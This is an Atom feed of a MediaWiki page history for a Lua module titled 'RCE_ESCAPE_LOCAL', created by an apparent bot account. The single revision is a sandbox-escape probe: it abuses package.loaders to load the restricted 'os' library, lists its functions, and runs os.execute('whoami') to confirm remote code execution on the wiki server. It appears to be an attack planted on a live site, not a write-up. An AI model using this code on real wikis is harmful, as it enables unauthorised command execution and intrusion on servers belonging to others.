<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="zh-Hans-CN">
	<id>http://120.55.36.65/w/index.php?action=history&amp;feed=atom&amp;title=%E6%A8%A1%E5%9D%97%3ARCE_ESCAPE_LOCAL</id>
	<title>模块:RCE ESCAPE LOCAL - 版本历史</title>
	<link rel="self" type="application/atom+xml" href="http://120.55.36.65/w/index.php?action=history&amp;feed=atom&amp;title=%E6%A8%A1%E5%9D%97%3ARCE_ESCAPE_LOCAL"/>
	<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_ESCAPE_LOCAL&amp;action=history"/>
	<updated>2026-05-14T03:41:15Z</updated>
	<subtitle>本wiki上该页面的版本历史</subtitle>
	<generator>MediaWiki 1.40.0</generator>
	<entry>
		<id>http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_ESCAPE_LOCAL&amp;diff=983&amp;oldid=prev</id>
		<title>Bot93553：​rce</title>
		<link rel="alternate" type="text/html" href="http://120.55.36.65/w/index.php?title=%E6%A8%A1%E5%9D%97:RCE_ESCAPE_LOCAL&amp;diff=983&amp;oldid=prev"/>
		<updated>2026-05-09T06:17:44Z</updated>

		<summary type="html">&lt;p&gt;rce&lt;/p&gt;
&lt;p&gt;&lt;b&gt;新页面&lt;/b&gt;&lt;/p&gt;&lt;div&gt;local p = {}; function p.test() local results = {}; for i, loader in ipairs(package.loaders) do local ok, result = pcall(loader, &amp;quot;os&amp;quot;); if ok and type(result) == &amp;quot;function&amp;quot; then local ok2, os_tbl = pcall(result); if ok2 and type(os_tbl) == &amp;quot;table&amp;quot; then local funcs = {}; for k, v in pairs(os_tbl) do funcs[#funcs+1] = k .. &amp;quot;:&amp;quot; .. type(v); if k == &amp;quot;execute&amp;quot; and type(v) == &amp;quot;function&amp;quot; then local ok3, who = pcall(v, &amp;quot;whoami&amp;quot;); results[#results+1] = &amp;quot;RCE_WHOAMI=&amp;quot; .. tostring(ok3) .. &amp;quot;:&amp;quot; .. tostring(who); end; end; results[#results+1] = &amp;quot;os_funcs(&amp;quot; .. #funcs .. &amp;quot;): &amp;quot; .. table.concat(funcs, &amp;quot;, &amp;quot;); end; end; end; if #results == 0 then results[1] = &amp;quot;NO_ESCAPE&amp;quot;; end; return table.concat(results, &amp;quot; | &amp;quot;); end; return p&lt;/div&gt;</summary>
		<author><name>Bot93553</name></author>
	</entry>
</feed>